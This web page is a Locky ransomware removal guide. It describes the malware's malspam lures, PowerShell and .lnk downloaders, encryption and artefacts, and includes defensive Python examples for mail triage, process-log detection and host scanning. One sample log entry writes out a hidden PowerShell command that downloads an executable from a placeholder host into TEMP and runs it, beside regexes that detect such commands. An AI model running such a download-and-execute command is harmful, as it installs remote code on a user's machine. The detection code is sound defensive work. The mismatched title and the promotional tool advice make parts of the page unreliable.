Autoit Remove File Extension
Posted by admin in Home, 27/08/17

Remove Locky virus (Removal Guide)

Another month, another Locky version: the criminal gang behind it is now spreading the Asasin variant. Locky is one of the most destructive ransomware-type infections: it takes over an operating system and starts encrypting the data on it. The initial extension the virus appended to encrypted files was .locky; .ykcol and .asasin are the latest extensions used by the family. In most cases the victims download the ransomware themselves as an ordinary email attachment, typically a Word document that asks the reader to enable macros. Once the macro runs, the AES and RSA encryption routines come into play and a specific extension is appended to every encrypted file. The file that carries the data recovery instructions is called _Locky_recover_instructions.txt. It is saved on the desktop and opened every time the victim tries to open an encrypted file.

Locky was the biggest threat of 2016. Nevertheless, nothing stops its creators from trying again: in June, virus researchers detected a new variant of Locky spreading via a malicious spam campaign run by the Necurs botnet. Unlike its predecessors, this variant infects machines running outdated and unsupported Windows versions such as Windows Vista or XP; newer Windows versions are protected by Data Execution Prevention (DEP), which blocks the malware's unpacker automatically [1]. The variants spread their malicious executable to the victim machine, where Locky leaves the tmp, AppData, Program Files, Windows and a few other folders alone but encrypts the rest of the files on the PC with RSA-2048 and AES-128. Eventually, the virus marks every encrypted document with its own extension.
Below is a table of the most frequent subjects and attachment types [2]. As you can see, Locky's developers even try to pass the infection off as a scanned document [3]. Note that the latest version of the threat is delivered under the guise of a Microsoft Store message: the supposed sender writes under the name "Microsoft Store". Although Microsoft Store exists, genuine emails from Microsoft (if it sends any at all) carry the full credentials of a representative.

Table of subjects and attachment names used in Locky malspam campaigns (bracketed parts are placeholders that vary per message):

Subject                                        | Attachment name
[service name]                                 | [name] + 6 random digits
Payment [date]                                 | [name] invoice + 6 random digits
Scanned image from [printer model]             | Scanned image from [printer model]
PAYMENT                                        | 17 digits
Voice Message Attached from 1...               | (attachment name garbled in the source)
Microsoft Store E-invoice for your order number | MSINV + random digits
Emailing: CSI 0...                             | MBS7727518b...
July/August 20..                               | (attachment name garbled in the source)
Status of invoice                              | 8 random chars + 2 random chars
Document invoice                               | 9...

Some malicious emails instead carry a broken .7z attachment and display a block of base64 text in the message body.

Locky hit the web at the beginning of 2016. Its volatility and unpredictability made Locky the first ransomware to reach the top three on the list of the most dangerous malware; together with the Conficker and Sality viruses it accounted for a large share of detections. It is not hard to notice that your device has been hit by this parasite: the file extensions mentioned above (.locky, .ykcol, .asasin and those of the intermediate variants) appear on every scrambled file. If you can see any of these extensions on your files (see the picture below), you need to remove Locky first; otherwise it can continue encrypting files on your computer and can also reach files on your network shares and similar locations. Some variants also drop their own ransom notes; the .shit version, for example, drops _WHAT_is.html and _WHAT_is.bmp. To remove this ransomware and its files, use a tool such as Reimage, Plumbytes Anti-Malware or Webroot SecureAnywhere AntiVirus. However, we must warn you that these programs cannot decrypt your encrypted files.
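The lure patterns in the table above are easy to turn into a mail-gateway triage rule. The following is an added example written for this guide, not code from the original page or from any vendor: it scores a message by lure wording in the subject, by the auto-generated attachment names in the table, by the fake Microsoft Store display name, and by the script-in-archive delivery described later in this guide. The sample messages, sender addresses and the `Message` shape are constructed for the example.

```python
"""Triage inbound mail for Locky-style malspam lures (added example)."""
import re
from dataclasses import dataclass, field

# Subject wording from the table above (case-insensitive).
SUBJECT_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"^payment\b",
    r"^scanned image from",
    r"^voice message attached",
    r"^status of invoice",
    r"^document invoice",
    r"e[- ]?invoice for your order",
    r"^emailing:?\s",
)]

# Script and shortcut types Locky droppers use, normally inside an archive.
DROPPER_EXTENSIONS = {".js", ".jse", ".wsf", ".hta", ".vbs", ".lnk"}
ARCHIVE_EXTENSIONS = {".zip", ".7z", ".rar"}

# Auto-generated attachment names: <word> + 6 random digits, or MSINV + digits.
GENERATED_NAME = re.compile(r"^(?:[a-z]+[_-]?\d{6}|msinv\d+)\.", re.IGNORECASE)


@dataclass
class Message:
    sender: str                      # "Display Name <address>" or bare address
    subject: str
    attachments: list = field(default_factory=list)
    archive_members: list = field(default_factory=list)  # names inside archives


def extension(name):
    dot = name.rfind(".")
    return name[dot:].lower() if dot >= 0 else ""


def sender_domain(sender):
    return sender.rsplit("@", 1)[-1].rstrip("> ").lower()


def score_message(msg):
    """Return (score, reasons); each matched heuristic adds one point."""
    reasons = []
    if any(p.search(msg.subject) for p in SUBJECT_PATTERNS):
        reasons.append("subject matches known lure wording")
    if "microsoft store" in msg.sender.lower() and sender_domain(msg.sender) != "microsoft.com":
        reasons.append("display name impersonates Microsoft Store")
    for name in msg.attachments:
        ext = extension(name)
        if ext in DROPPER_EXTENSIONS:
            reasons.append(f"script or shortcut attached directly: {name}")
        if GENERATED_NAME.match(name):
            reasons.append(f"auto-generated attachment name: {name}")
        if ext in ARCHIVE_EXTENSIONS:
            for member in msg.archive_members:
                if extension(member) in DROPPER_EXTENSIONS:
                    reasons.append(f"archive {name} contains script {member}")
    return len(reasons), reasons


def quarantine_candidates(messages, threshold=2):
    """Subjects of messages scoring at or above the threshold."""
    return [m.subject for m in messages if score_message(m)[0] >= threshold]


# Constructed samples shaped like the lures described in this guide.
SAMPLES = [
    Message("Microsoft Store <billing@ms-store-orders.example>",
            "E-invoice for your order number 28391",
            ["MSINV7284591.zip"], ["MSINV7284591.js"]),
    Message("scanner@corp.example", "Scanned image from MX-2600N",
            ["Scanned image from MX-2600N.zip"], ["Scanned image from MX-2600N.wsf"]),
    Message("alice@corp.example", "Q3 budget draft", ["budget.xlsx"]),
]

if __name__ == "__main__":
    for m in SAMPLES:
        print(m.subject, score_message(m))
    print("quarantine:", quarantine_candidates(SAMPLES))
```

The subject patterns alone are too noisy to block on (real invoices exist), which is why the score combines them with the attachment evidence; a script inside an archive plus a lure subject is enough to quarantine.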
Virus researchers are still working on a cure for this version of the ransomware. Meanwhile, to recover your .locky files you can use the data recovery tips prepared by 2-spyware.

Distribution tactics used by the developers of the infamous ransomware

Locky ransomware, along with most of its follow-up versions, is distributed mainly via spam email attachments. It typically uses obfuscated HTA, JS or WSF files that try to convince the victim they contain something important. The most popular one is a JavaScript file whose name begins with MRI6...; it is believed to be the main file used to install Locky on the system. If you see such a file attached to a suspicious email from an unknown sender, delete the email immediately. In the past the ransomware used Word files to infiltrate the system without letting the victim know what was going on behind his or her back. IT experts have also identified that the threat relies on the Nemucod downloader and on .LNK files. The .LNK file type represents Windows shortcuts, and a shortcut can point at an application most people have on their computers, for example PowerShell. The malicious .lnk file carries a PowerShell script that connects to specific domains using a URL parameter. The use of a parameter is a clear sign that criminals control these domains; the malicious sites may be purpose-built or legitimate ones that have been compromised and are kept under the criminals' control. Researchers from Microsoft report that the sites are updated daily with new versions of the malware payload. The PowerShell script downloads the ransomware from the predetermined domains and typically saves it in the TEMP folder. The point of this technique is to let the new Locky evade detection by malware removal utilities, so it is of utmost importance to update security programs daily.
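The shortcut-to-PowerShell-to-TEMP chain described above leaves a clear trace in process-creation telemetry. The following is an added example written for this guide, not code from the original page or from Microsoft: it runs a few rules over constructed process-creation records (a tab-separated parent image, image and command line, which is an assumed simplified layout rather than any real sensor's schema) and flags the hidden PowerShell download cradle with a parameterised URL, the script host opening an extracted attachment from Temp, and the downloaded payload itself executing from Temp. The hostnames and file names are invented for the sample.

```python
"""Detect the .lnk -> PowerShell -> %TEMP% payload chain in process logs (added example)."""
import re

DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient",
    re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# A URL whose path carries a query parameter, the sign of an attacker-controlled host.
URL_WITH_PARAM = re.compile(r"https?://[^\s'\"]+\?[^\s'\"]+", re.IGNORECASE)
TEMP_PATH = re.compile(r"\\temp\\|\$env:temp|%temp%", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXT = re.compile(r"\.(?:js|jse|wsf|hta|vbs)\b", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(line):
    """Return the list of findings for one 'parent<TAB>image<TAB>cmdline' record."""
    parent, image, cmdline = line.split("\t", 2)
    findings = []
    img = basename(image)
    if img == "powershell.exe":
        if DOWNLOAD_CRADLE.search(cmdline):
            findings.append("powershell download cradle")
        if HIDDEN_WINDOW.search(cmdline):
            findings.append("hidden window")
        if URL_WITH_PARAM.search(cmdline):
            findings.append("URL carries a query parameter")
        if TEMP_PATH.search(cmdline):
            findings.append("payload staged in TEMP")
        if findings and basename(parent) == "explorer.exe":
            findings.append("launched by explorer.exe (shortcut double-click)")
    elif img in SCRIPT_HOSTS and SCRIPT_EXT.search(cmdline) and TEMP_PATH.search(cmdline):
        findings.append(f"{img} running a script from TEMP (extracted attachment)")
    elif TEMP_PATH.search(image):
        findings.append("executable running from TEMP")
    return findings


def triage(lines):
    """(index, findings) for every record that triggered at least one rule."""
    return [(i, f) for i, line in enumerate(lines) for f in [analyse_event(line)] if f]


# Constructed records; paths and hostnames are invented for the example.
SAMPLE_EVENTS = [
    # 1: the shortcut starts a hidden PowerShell that fetches a payload into TEMP
    "C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile("
    "'http://invoice-host.invalid/get.php?id=7f3a', $env:TEMP+'\\jzvb.exe'); "
    "Start-Process ($env:TEMP+'\\jzvb.exe')",
    # 2: wscript opens a JS attachment that Explorer extracted into the Temp folder
    "C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\wscript.exe\t"
    "wscript.exe \"C:\\Users\\jdoe\\AppData\\Local\\Temp\\Temp1_invoice.zip\\invoice_483920.js\"",
    # 3: the downloaded payload itself
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "C:\\Users\\jdoe\\AppData\\Local\\Temp\\jzvb.exe\tjzvb.exe",
    # 4: ordinary administrative PowerShell use, must stay quiet
    "C:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS):
        print(index, findings)
```

Each rule on its own is a weak signal; the value is in the chain, so an alert should correlate the explorer.exe parent, the hidden download cradle, the Temp write and the later execution from Temp on the same host within a short window.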
In the second half of June, Necurs, which had gone quiet for a few weeks and was believed to have been shut down, re-emerged and started delivering updated Locky versions [7]. Unfortunately, it seems the botnet was actively used to spread this ransomware via infected email attachments named [name] + 6 random digits. All of these ZIP archives carry the malicious JavaScript file; once the victim opens it, the malicious executable gets onto the system and starts working. You have to perform a full Locky removal to get rid of it.

Get to know how the original Locky operates

When Locky was noticed for the first time, it seemed to work much like CTB-Locker, CryptoWall, TeslaCrypt and CryptoLocker. Just like its predecessors, it used a combination of the RSA-2048 and AES-128 ciphers to leave its victims unable to retrieve their files. This combination can be beaten only with the private decryption key, which is held by the malware's developers. In exchange for this key, victims are asked to pay a ransom in Bitcoin, starting at 0.5 BTC (a few hundred dollars at the time). Nevertheless, security experts have been urging victims NOT to pay for this key, because there is no guarantee that it will work for them.

Once installed, the virus saves itself as svchost.exe in the %TEMP% directory. It also strips the Zone.Identifier alternate data stream from that file, so that Windows does not identify it as a file downloaded from the Internet and warn the victim, and then executes it. The virus adds itself to the startup programs so that, if the victim restarts or shuts down the PC before or during the encryption process, it can still finish the job. It must be noted that the virus contacts its C&C server to obtain the unique encryption key before data encryption begins, and encrypting all targeted files can take several hours. Locky can also run built-in Windows commands, for instance to delete the Volume Shadow Copies, so that no local backups survive.
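The host-side artefacts described above (encrypted files carrying a Locky extension, ransom notes next to them, an svchost.exe copy living in a Temp folder instead of System32, and an autostart entry pointing into Temp) can be checked with a short triage script. The following is an added example written for this guide, not code from the original page or from any removal tool. It builds a constructed victim-like directory tree and a constructed set of autostart entries so it runs offline on any operating system; on a real host you would point `scan_tree` at the user profile and feed it the actual Run-key values. The extension and note-name lists include .locky, .ykcol, .asasin and the _WHAT_is notes named in this guide plus the extensions and note names used by intermediate Locky variants.

```python
"""Host triage for Locky artefacts (added example)."""
import re
import shutil
import tempfile
from pathlib import Path

# .locky, .ykcol, .asasin and .shit are named in this guide; the others are
# extensions earlier Locky variants appended.
LOCKY_EXTENSIONS = {".locky", ".zepto", ".odin", ".shit", ".thor", ".aesir",
                    ".zzzzz", ".osiris", ".loptr", ".diablo6", ".lukitus",
                    ".ykcol", ".asasin"}

# Ransom note names: _Locky_recover_instructions.* and _WHAT_is.* are named in
# this guide; the remaining names belong to later variants.
RANSOM_NOTE = re.compile(
    r"^(?:_locky_recover_instructions|_help_instructions|(?:_\d+)?_what_is|"
    r"diablo6|lukitus|ykcol|asasin)\.(?:txt|bmp|html?)$", re.IGNORECASE)

# A path component named Temp, in either path separator style.
TEMP_DIR = re.compile(r"(?:^|[\\/])temp(?:[\\/]|$)", re.IGNORECASE)


def scan_tree(root):
    """Collect encrypted files, ransom notes and Temp-resident svchost copies under root."""
    hits = {"encrypted": [], "notes": [], "dropper": []}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        name = path.name.lower()
        if path.suffix.lower() in LOCKY_EXTENSIONS:
            hits["encrypted"].append(path)
        elif RANSOM_NOTE.match(name):
            hits["notes"].append(path)
        elif name == "svchost.exe" and TEMP_DIR.search(str(path.parent)):
            # svchost.exe belongs in System32; a copy in a Temp folder is the dropper.
            hits["dropper"].append(path)
    return hits


def suspicious_autostart(entries):
    """Autostart entries (value name -> command) whose command runs from a Temp folder."""
    return {name: cmd for name, cmd in entries.items() if TEMP_DIR.search(cmd)}


def build_demo_tree():
    """Constructed victim-like tree: one encrypted file, one note, one dropper copy."""
    root = Path(tempfile.mkdtemp(prefix="locky-demo-"))
    docs = root / "Users" / "jdoe" / "Documents"
    temp = root / "Users" / "jdoe" / "AppData" / "Local" / "Temp"
    sys32 = root / "Windows" / "System32"
    for d in (docs, temp, sys32):
        d.mkdir(parents=True)
    (docs / "F67091F1D24A922B1A7FC27E19A9D9BC.locky").write_bytes(b"\x00" * 64)
    (docs / "budget.xlsx").write_bytes(b"PK constructed, not a real workbook")
    (docs / "_Locky_recover_instructions.txt").write_text("constructed ransom note")
    (temp / "svchost.exe").write_bytes(b"MZ constructed, not a real PE")
    (sys32 / "svchost.exe").write_bytes(b"MZ constructed, legitimate location")
    return root


# Constructed Run-key values as a value name -> command mapping.
AUTOSTART = {
    "svchost": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
    "OneDrive": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}


def triage_demo():
    """Run the scan over the constructed tree and return file names plus flagged autostarts."""
    root = build_demo_tree()
    try:
        hits = scan_tree(root)
        return {k: [p.name for p in v] for k, v in hits.items()}, suspicious_autostart(AUTOSTART)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    hits, autostart = triage_demo()
    for kind, names in hits.items():
        print(f"{kind}: {names}")
    print("autostart:", autostart)
```

The dropper check deliberately keys on location rather than name alone: the legitimate svchost.exe in System32 is left untouched, and it is the Temp-resident copy, together with the autostart entry that points at it, that the removal has to take out before the files are restored from backup.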